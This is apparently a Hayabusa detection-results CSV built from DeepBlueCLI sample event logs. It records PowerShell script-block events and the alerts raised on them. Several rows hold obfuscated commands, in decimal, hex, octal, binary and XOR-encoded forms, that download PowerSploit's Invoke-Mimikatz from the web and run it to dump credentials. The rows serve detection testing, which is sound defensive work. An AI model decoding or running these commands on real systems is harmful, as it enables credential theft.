2017-08-31 04:12:09.191 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('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'|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('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'|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:13:38.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $eNv:COmSPEc[4,15,25]-JoIN'') ([ChAr[]] (73, 69 , 88 ,32 ,40,78 ,101 ,119 ,45, 79, 98,106 ,101,99 , 116 ,32 ,78,101, 116, 46,87, 101 ,98 , 67 ,108 ,105,101 ,110, 116 ,41 , 46, 68, 111 ,119 , 110 , 108 , 111 ,97 ,100 , 83,116, 114,105 , 110, 103, 40 , 39, 104, 116 , 116,112 , 115,58,47,47 ,114, 97 ,119,46 , 103,105 , 116, 104,117, 98 ,117 , 115 , 101 ,114,99, 111 ,110 , 116,101 ,110 , 116, 46 , 99 , 111,109 ,47 ,109 ,97,116 , 116,105,102, 101 , 115 , 116,97 , 116 ,105 ,111 , 110,47,80,111 ,119 , 101,114,83, 112, 108,111, 105,116 ,47,109, 97 , 115 , 116, 101 ,114,47 ,69 ,120, 102,105, 108,116 , 114, 97,116 , 105,111,110, 47 , 73,110 ,118 ,111 , 107 , 101,45 , 77, 105 ,109 , 105, 107 , 97 , 116, 122 , 46 ,112 ,115, 49, 39 ,41 , 59 , 32,73 , 110 , 118 ,111 ,107 ,101,45,77,105 , 109 ,105, 107 ,97, 116 ,122,32 ,45 , 68 ,117 ,109,112 , 67 ,114 , 101,100 , 115 )-join '')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:13:52.552 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"[sTRInG]::jOiN('' , (( 49 ,45 , 58,20,28 , '4e',65,77 , '2d' ,'4f' ,62 , '6a' , 65,63, 74 ,20 ,'4e', 65 ,74 ,'2e' ,57, 65 , 62,43 ,'6c',69, 65 , '6e' , 74 ,29 ,'2e',44,'6f' , 77 ,'6e','6c' , '6f' ,61, 64 ,53 , 74,72 ,69 ,'6e',67, 28, 27 , 68 ,74, 74,70 ,73, '3a', '2f','2f', 72, 61, 77 , '2e',67,69, 74 ,68 , 75,62, 75, 73,65 ,72,63, '6f','6e',74 ,65, '6e', 74 ,'2e',63 ,'6f', '6d','2f' , '6d', 61 ,74 ,74, 69,66 , 65, 73 ,74 ,61, 74 , 69 ,'6f' , '6e', '2f' ,50,'6f',77, 65,72,53 ,70, '6c' , '6f' ,69 ,74, '2f' , '6d' , 61 , 73 , 74,65,72 , '2f' ,45,78,66, 69, '6c', 74 , 72,61, 74,69,'6f' , '6e' , '2f' , 49,'6e' , 76, '6f','6b' ,65 , '2d' , '4d' ,69,'6d' , 69, '6b',61 , 74 , '7a' , '2e',70, 73 , 31 , 27, 29 ,'3b' ,20 ,49 ,'6e' , 76,'6f', '6b', 65, '2d', '4d',69, '6d' ,69,'6b' , 61 ,74, '7a' , 20 , '2d' ,44 , 75,'6d' , 70, 43, 72 ,65 ,64 , 73)|FoReaCh{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}))|&( $enV:PuBlic[13]+$eNv:PUbliC[5]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:13:52.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.419 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.432 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.526 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.531 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.534 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.537 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.543 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.590 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.603 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.765 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.772 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:24.809 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $ENV:pUbLIc[13]+$EnV:pubLIc[5]+'X') ([STrIng]::JOin('' , ((111 ,105, 130 , 40,50,116 ,145 , 167, 55,117,142 , 152 ,145,143 ,164 , 40, 116,145,164,56, 127, 145 ,142, 103 ,154, 151 ,145 ,156 , 164,51, 56 , 104 ,157, 167 ,156 , 154 , 157 , 141 , 144, 123 ,164,162 ,151, 156,147, 50 ,47 ,150 , 164,164,160 , 163 , 72,57, 57,162, 141,167 , 56,147 ,151, 164,150, 165, 142 ,165 , 163, 145, 162,143 ,157, 156 ,164 ,145,156 , 164,56 ,143 ,157 ,155,57, 155 ,141, 164 , 164, 151 , 146,145 ,163, 164 , 141, 164 ,151, 157, 156 ,57 , 120 ,157,167 , 145,162 , 123,160 , 154, 157, 151, 164, 57,155 , 141, 163 ,164,145,162,57,105, 170 , 146,151, 154, 164 , 162 , 141,164,151,157,156 , 57,111,156 , 166 , 157, 153, 145,55, 115 ,151, 155 ,151, 153,141, 164 ,172,56, 160 , 163, 61 ,47 ,51,73 , 40,111,156 , 166, 157 ,153 , 145 ,55 ,115, 151 , 155 ,151 ,153 , 141, 164 ,172 ,40,55, 104,165 , 155, 160 ,103, 162 , 145 , 144 , 163 )| FOrEacH { ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) } )))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:51.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $vErBOSePreFErencE.TOSTRING()[1,3]+'X'-joIN'')(( '1001001}1000101r1011000C100000&101000&1001110C1100101r1110111C101101;1001111v1100010;1101010r1100101v1100011j1110100v100000X1001110o1100101}1110100X101110}1010111;1100101r1100010v1000011X1101100v1101001j1100101v1101110j1110100}101001j101110}1000100j1101111g1110111g1101110}1101100g1101111g1100001;1100100;1010011}1110100;1110010g1101001X1101110&1100111X101000v100111}1101000;1110100r1110100j1110000}1110011v111010j101111r101111}1110010o1100001X1110111r101110r1100111X1101001&1110100o1101000g1110101j1100010C1110101}1110011&1100101X1110010}1100011}1101111j1101110v1110100j1100101C1101110;1110100r101110&1100011r1101111;1101101&101111&1101101X1100001}1110100}1110100;1101001o1100110v1100101;1110011C1110100C1100001j1110100r1101001;1101111o1101110o101111j1010000&1101111X1110111}1100101j1110010j1010011&1110000;1101100r1101111r1101001;1110100o101111&1101101v1100001r1110011;1110100g1100101j1110010j101111r1000101v1111000r1100110j1101001X1101100C1110100r1110010;1100001o1110100C1101001;1101111X1101110j101111C1001001X1101110;1110110}1101111r1101011&1100101j101101&1001101r1101001v1101101;1101001o1101011o1100001&1110100o1111010v101110g1110000r1110011}110001g100111o101001v111011j100000;1001001j1101110r1110110X1101111v1101011}1100101v101101;1001101r1101001&1101101;1101001C1101011v1100001&1110100j1111010}100000}101101}1000100C1110101v1101101r1110000v1000011j1110010r1100101v1100100;1110011' -splIT 'o'-splIt '&' -SPlIT 'r' -SplIt 'v' -sPLIT 'g'-SPliT';'-spLIT'X'-sPlIt'}' -sPLIT 'C'-SPLIT'j'|FOReaCH-ObjEct {([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) })-JOIN '' )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:14:51.666 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('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'|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.455 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.469 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.555 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.568 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.571 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.577 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.580 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.585 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:15:39.588 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 
04:15:39.901 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:40.071 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:40.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:40.121 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:43.135 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 
